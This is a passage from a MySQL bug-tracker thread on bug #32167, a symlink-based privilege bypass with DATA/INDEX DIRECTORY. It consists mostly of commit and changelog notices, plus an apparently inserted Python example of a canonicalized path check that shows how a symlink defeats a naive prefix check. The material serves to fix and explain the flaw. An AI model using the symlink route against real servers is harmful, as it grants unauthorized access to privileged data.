be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/56925

2642 Jonathan Perkin	2008-10-23
      Merge fixes for bug#32167 and bug#37428 into 5.0.66sp1
[28 Oct 2008 21:01] Bugs System
Pushed into 5.1.29-ndb-6.2.17  (revid:mattiasj@mysql.com-20080828145922-sydhto6u4va3cb4b) (version source revid:tomas.ulin@sun.com-20081028140209-u4emkk1xphi5tkfb) (pib:5)
[28 Oct 2008 22:20] Bugs System
Pushed into 5.1.29-ndb-6.3.19  (revid:mattiasj@mysql.com-20080828145922-sydhto6u4va3cb4b) (version source revid:tomas.ulin@sun.com-20081028194045-0353yg8cvd2c7dd1) (pib:5)
[1 Nov 2008 9:44] Bugs System
Pushed into 5.1.29-ndb-6.4.0  (revid:mattiasj@mysql.com-20080828145922-sydhto6u4va3cb4b) (version source revid:jonas@mysql.com-20081101082305-qx5a1bj0z7i8ueys) (pib:5)
[21 Nov 2008 17:07] Paul Dubois
Noted in 5.0.66sp1 changelog.
[25 Nov 2008 16:26] Paul Dubois
For the record, here's a summary history of fixes for this bug:

* Original fix applied to 4.1.24, 5.0.60, 5.1.24, 6.0.5
* Secondary fix applied to 4.1.25, 5.0.70, 5.1.28, 6.0.6
* Original fix applied to first Community release following 5.0.60 (i.e., 5.0.67)
* Original + secondary fixes applied to 5.0.66sp1 Service Pack release

Description for the secondary fix:

Additional corrections were made for the symlink-related privilege
problem originally addressed. The original fix did not correctly
handle the data directory pathname if it contained symlinked
directories in its path, and the check was made only at 
table-creation time, not at table-opening time later.
[16 Jan 2009 11:16] Bugs System
Pushed into 5.0.77 (revid:joerg@mysql.com-20090115110809-bnb54922hwgrv2hk) (version source revid:joerg@mysql.com-20090115104831-o8sb30ms6qc8s8je) (merge vers: 5.0.77) (pib:6)
[16 Jan 2009 11:20] Bugs System
Pushed into 5.1.32 (revid:joerg@mysql.com-20090115181125-29qdo615v9vkla0t) (version source revid:joerg@mysql.com-20090115181125-29qdo615v9vkla0t) (merge vers: 5.1.32) (pib:6)
[20 Jan 2009 18:55] Bugs System
Pushed into 6.0.10-alpha (revid:joro@sun.com-20090119171328-2hemf2ndc1dxl0et) (version source revid:timothy.smith@sun.com-20090116165151-xtp5e4z6qsmxyvy0) (merge vers: 6.0.10-alpha) (pib:6)
[17 Feb 2009 14:56] Bugs System
Pushed into 5.1.32-ndb-6.3.23 (revid:tomas.ulin@sun.com-20090217131017-6u8qz1edkjfiobef) (version source revid:tomas.ulin@sun.com-20090203133556-9rclp06ol19bmzs4) (merge vers: 5.1.32-ndb-6.3.22) (pib:6)
[17 Feb 2009 16:44] Bugs System
Pushed into 5.1.32-ndb-6.4.3 (revid:tomas.ulin@sun.com-20090217134419-5ha6xg4dpedrbmau) (version source revid:tomas.ulin@sun.com-20090203133556-9rclp06ol19bmzs4) (merge vers: 5.1.32-ndb-6.3.22) (pib:6)
[17 Feb 2009 18:20] Bugs System
Pushed into 5.1.32-ndb-6.2.17 (revid:tomas.ulin@sun.com-20090217134216-5699eq74ws4oxa0j) (version source revid:tomas.ulin@sun.com-20090201210519-vehobc4sy3g9s38e) (merge vers: 5.1.32-ndb-6.2.17) (pib:6)
[17 Jun 2009 19:24] Bugs System
Pushed into 5.4.4-alpha (revid:alik@sun.com-20090616183122-chjzbaa30qopdra9) (version source revid:joro@sun.com-20090515134506-5mq3a8fafgbkx6u1) (merge vers: 6.0.12-alpha) (pib:11)
[14 Jul 2009 13:53] Sergei Golubchik
Reopened, the fix had a bug: in mysqld.cc, fix_paths() calculated mysql_unpacked_real_data_home from mysql_real_data_home *before* mysql_real_data_home itself was expanded. For example, when mysql_real_data_home was specified as a relative path, mysql_unpacked_real_data_home was interpreting it relative to pwd(), not to mysql_home.
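The two defects Paul Dubois summarizes above (symlinked directories in the data directory path, and a check made only at table-creation time) and the initialization-order bug in the reopen comment, shown as an added Python example that is not MySQL's code: the check compares canonicalized paths on both sides, and a relative data home is anchored at the server home before it is resolved. All directory names are constructed in a temporary directory; `mysql_home`, `var`, `alias` and `elsewhere` are hypothetical.

```python
import os
import shutil
import tempfile


def resolve_data_home(data_home, mysql_home):
    """Canonical data directory. A relative data_home is joined to
    mysql_home BEFORE realpath, so the result never depends on the
    process cwd (the initialization-order defect in the reopen comment)."""
    return os.path.realpath(os.path.join(mysql_home, data_home))


def is_under_data_home(candidate, real_data_home):
    """True if candidate denotes the data home or anything inside it.
    Both sides are canonicalized, so a symlinked directory anywhere in
    either path cannot disguise the destination. The same check belongs
    at CREATE TABLE and again when the table is opened later."""
    real = os.path.realpath(candidate)
    return real == real_data_home or real.startswith(real_data_home + os.sep)


def naive_is_under_data_home(candidate, data_home):
    """The weak form: a plain prefix comparison on the strings as given."""
    return candidate.startswith(data_home + os.sep)


def demo():
    """Constructed layout (hypothetical paths) exercising both checks."""
    root = tempfile.mkdtemp()
    mysql_home = os.path.join(root, "mysql")
    datadir = os.path.join(mysql_home, "var")
    os.makedirs(os.path.join(datadir, "mysql"))       # the privileged 'mysql' db
    os.makedirs(os.path.join(root, "elsewhere"))       # a legitimate external dir
    os.symlink(datadir, os.path.join(root, "alias"))   # symlinked route into datadir
    real_home = resolve_data_home("var", mysql_home)   # relative, as in a config file
    via_alias = os.path.join(root, "alias", "mysql")
    try:
        return {
            "direct": is_under_data_home(os.path.join(datadir, "mysql"), real_home),
            "via_symlink": is_under_data_home(via_alias, real_home),
            "naive_misses_symlink": naive_is_under_data_home(via_alias, datadir),
            "outside": is_under_data_home(os.path.join(root, "elsewhere"), real_home),
            "cwd_resolution_differs": os.path.realpath("var") != real_home,
        }
    finally:
        shutil.rmtree(root)
```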
[14 Jul 2009 15:26] Ingo Strüwing
Bug#40980 (Drop table can remove another MyISAM table's data and index files) has been marked as a duplicate of this bug report.
[26 Aug 2009 13:46] Bugs System
Pushed into 5.1.37-ndb-7.0.8 (revid:jonas@mysql.com-20090826132541-yablppc59e3yb54l) (version source revid:jonas@mysql.com-20090826132541-yablppc59e3yb54l) (merge vers: 5.1.37-ndb-7.0.8) (pib:11)
[26 Aug 2009 13:46] Bugs System
Pushed into 5.1.37-ndb-6.3.27 (revid:jonas@mysql.com-20090826105955-bkj027t47gfbamnc) (version source revid:jonas@mysql.com-20090826105955-bkj027t47gfbamnc) (merge vers: 5.1.37-ndb-6.3.27) (pib:11)
[26 Aug 2009 13:48] Bugs System
Pushed into 5.1.37-ndb-6.2.19 (revid:jonas@mysql.com-20090825194404-37rtosk049t9koc4) (version source revid:jonas@mysql.com-20090825194404-37rtosk049t9koc4) (merge vers: 5.1.37-ndb-6.2.19) (pib:11)
[27 Aug 2009 16:32] Bugs System
Pushed into 5.1.35-ndb-7.1.0 (revid:magnus.blaudd@sun.com-20090827163030-6o3kk6r2oua159hr) (version source revid:jonas@mysql.com-20090826132541-yablppc59e3yb54l) (merge vers: 5.1.37-ndb-7.0.8) (pib:11)
[3 Nov 2009 13:49] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/89133

2837 Georgi Kodinov	2009-11-03
      Bug #32167: another privilege bypass with DATA/INDEX DIRECTORY
      
      Fixed an initialization order remark by Serg: correct directory
      expansion order implemented on server startup.
[4 Nov 2009 9:16] Bugs System
Pushed into 5.0.88 (revid:joro@sun.com-20091104091355-hpz6dwgkrfmokj3k) (version source revid:joro@sun.com-20091027131106-1w5i5wrb27oqewk2) (merge vers: 5.0.88) (pib:13)
[4 Nov 2009 9:25] Bugs System
Pushed into 5.1.41 (revid:joro@sun.com-20091104092152-qz96bzlf2o1japwc) (version source revid:kristofer.pettersson@sun.com-20091103162305-08l4gkeuif2ozsoj) (merge vers: 5.1.41) (pib:13)
[10 Nov 2009 11:44] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/89940

2845 Georgi Kodinov	2009-11-03
      Bug #32167: another privilege bypass with DATA/INDEX DIRECTORY
      
      Fixed an initialization order remark by Serg: correct directory
      expansion order implemented on server startup.
[11 Nov 2009 6:52] Bugs System
Pushed into 6.0.14-alpha (revid:alik@sun.com-20091110093407-rw5g8dys2baqkt67) (version source revid:alik@sun.com-20091109080109-7dxapd5y5pxlu08w) (merge vers: 6.0.14-alpha) (pib:13)
[11 Nov 2009 6:59] Bugs System
Pushed into 5.5.0-beta (revid:alik@sun.com-20091109115615-nuohp02h8mdrz8m2) (version source revid:alik@sun.com-20091105092041-sp6eyod7sdlfuj3b) (merge vers: 5.5.0-beta) (pib:13)
[12 Nov 2009 3:50] Paul Dubois
Noted in 5.1.41, 5.5.0, 6.0.14 changelogs.

Additional corrections were made for the symlink-related privilege
problem originally addressed in MySQL 5.1.24. The original fix did
not correctly handle the data directory path name if it contained
symlinked directories in its path, and the check was made only at
table-creation time, not at table-opening time later.
[2 Dec 2009 8:05] Bugs System
Pushed into 5.1.42 (revid:joro@sun.com-20091202080033-mndu4sxwx19lz2zs) (version source revid:joro@sun.com-20091110124212-miog36hnvtfxxb3o) (merge vers: 5.1.41) (pib:13)
[16 Dec 2009 8:38] Bugs System
Pushed into 6.0.14-alpha (revid:alik@sun.com-20091216083311-xorsasf5kopjxshf) (version source revid:alik@sun.com-20091214191830-wznm8245ku8xo702) (merge vers: 6.0.14-alpha) (pib:14)
[16 Dec 2009 8:45] Bugs System
Pushed into 5.5.0-beta (revid:alik@sun.com-20091216082430-s0gtzibcgkv4pqul) (version source revid:alexey.kopytov@sun.com-20091124081906-6pqi7e7sajimog71) (merge vers: 5.5.0-beta) (pib:14)
[16 Dec 2009 8:52] Bugs System
Pushed into mysql-next-mr (revid:alik@sun.com-20091216083231-rp8ecpnvkkbhtb27) (version source revid:alik@sun.com-20091212203859-fx4rx5uab47wwuzd) (merge vers: 5.6.0-beta) (pib:14)
[16 Dec 2009 15:34] Paul Dubois
Already fixed in 5.5.x, 6.0.x.
[17 Dec 2009 11:49] Sergei Golubchik
the last problem got its own CVE-2009-4030
[18 Dec 2009 10:31] Bugs System
Pushed into 5.1.41-ndb-7.1.0 (revid:jonas@mysql.com-20091218102229-64tk47xonu3dv6r6) (version source revid:jonas@mysql.com-20091218095730-26gwjidfsdw45dto) (merge vers: 5.1.41-ndb-7.1.0) (pib:15)
[18 Dec 2009 10:47] Bugs System
Pushed into 5.1.41-ndb-6.2.19 (revid:jonas@mysql.com-20091218100224-vtzr0fahhsuhjsmt) (version source revid:jonas@mysql.com-20091217101452-qwzyaig50w74xmye) (merge vers: 5.1.41-ndb-6.2.19) (pib:15)
[18 Dec 2009 11:02] Bugs System
Pushed into 5.1.41-ndb-6.3.31 (revid:jonas@mysql.com-20091218100616-75d9tek96o6ob6k0) (version source revid:jonas@mysql.com-20091217154335-290no45qdins5bwo) (merge vers: 5.1.41-ndb-6.3.31) (pib:15)
[18 Dec 2009 11:16] Bugs System
Pushed into 5.1.41-ndb-7.0.11 (revid:jonas@mysql.com-20091218101303-ga32mrnr15jsa606) (version source revid:jonas@mysql.com-20091218064304-ezreonykd9f4kelk) (merge vers: 5.1.41-ndb-7.0.11) (pib:15)
[21 Dec 2009 10:36] Tomas Hoger
Can anyone confirm that "Fixed a initialization order remark by Serg" fix is what is referred to in 5.1.41 release notes (and also in .24 and .28 as "additional fix in .41")?  The fix is committed in 5.1 bazaar branch:

http://bazaar.launchpad.net/~mysql/mysql-server/mysql-5.1/revision/1810.3967.4

but it does not seem to have made it to 5.1.41.  Am I missing some other change?
[21 Dec 2009 10:57] Georgi Kodinov
Tomas,

Yes, it should be out with 5.1.42.
[12 Mar 2010 14:11] Bugs System
Pushed into 5.1.44-ndb-7.0.14 (revid:jonas@mysql.com-20100312135944-t0z8s1da2orvl66x) (version source revid:jonas@mysql.com-20100312115609-woou0te4a6s4ae9y) (merge vers: 5.1.44-ndb-7.0.14) (pib:16)
[12 Mar 2010 14:28] Bugs System
Pushed into 5.1.44-ndb-6.2.19 (revid:jonas@mysql.com-20100312134846-tuqhd9w3tv4xgl3d) (version source revid:jonas@mysql.com-20100312060623-mx6407w2vx76h3by) (merge vers: 5.1.44-ndb-6.2.19) (pib:16)
[12 Mar 2010 14:43] Bugs System
Pushed into 5.1.44-ndb-6.3.33 (revid:jonas@mysql.com-20100312135724-xcw8vw2lu3mijrhn) (version source revid:jonas@mysql.com-20100312103652-snkltsd197l7q2yg) (merge vers: 5.1.44-ndb-6.3.33) (pib:16)
[26 Sep 2012 15:42] [ name withheld ]
Further note ... although it's claimed above that the last fix (change of order of operations) was pushed into 5.0.88, I see no such change in the released 5.0.95 tarball.